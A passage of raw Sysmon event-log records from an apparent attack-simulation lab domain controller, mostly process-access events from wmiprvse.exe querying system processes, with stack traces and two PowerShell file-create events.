|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vbk2kwve.gbw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 